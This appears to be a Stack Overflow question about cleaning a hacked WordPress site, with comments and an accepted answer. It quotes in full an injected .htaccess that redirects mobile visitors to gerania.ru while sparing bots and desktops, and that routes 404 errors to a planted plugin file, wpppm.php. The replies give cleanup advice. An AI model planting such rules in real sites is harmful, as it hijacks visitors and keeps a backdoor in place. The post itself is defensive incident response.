# Wordpress site backdoor - hack

Tags: php, wordpress, .htaccess

I have been trying to clean a wordpress website that has been "hacked".

If the site is opened in a mobile phone it redirects to a rumanian site. I have seen how to solve that problem because it is in the .htaccess:

```
########GET#######
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Moby [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Mobi [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://gerania.ru [L,R=302]



RewriteEngine on 
RewriteCond %{REQUEST_FILENAME} -f [OR]
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule ^(.+) - [PT,L]
RewriteRule ^(.+) index.php
ErrorDocument 404 /web/wp-content/plugins/wpppm/wpppm.php
```

But the problem is that also the content that is loaded in the site is missing, I can't find the script that is removing the content (this happens both on mobile and desktop).

Any ideas how to solve it?

I have checked all of this with no luck:
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://ottopress.com/2011/how-to-cope-with-a-hacked-site/

Comment: Remove this htaccess, deactivate all plugins, click save permalinks in WP Admin Panel. It will generate new, clean htaccess

Comment: take wordpress fresh install, put it in github repo, take a copy of the site and put it in the same folder and update the repo, you will see which pages has been changed ;)

Comment: You can export content by some plugins or inbuilt functions and do a fresh install like @jycr753 pointed out.

Comment: ok, will check that way and update here with the results. thanks

Comment: Possible duplicate of [Best methods to clean up a hacked site with no clean version available?](http://stackoverflow.com/questions/6337976/best-methods-to-clean-up-a-hacked-site-with-no-clean-version-available)

Answer (score 1, accepted):

Go into wp-content/plugins and remove the wpppm folder as well as updating your .htaccess file. I ran into this today.

Comment: I believe I have the same hack on my website. However I can't see the 'wpppm' folder in my plugins. But I'm getting emails saying that folder has been modified. Is there a way the hacker can hide files and folders from me on FTP?

Comment: hey, i know this is old, but i just came across this hack and im wondering if anyone knows how sites get infected like this to begin with?

Comment: From the research I did, it appears the hack came in through a Wordpress add-on.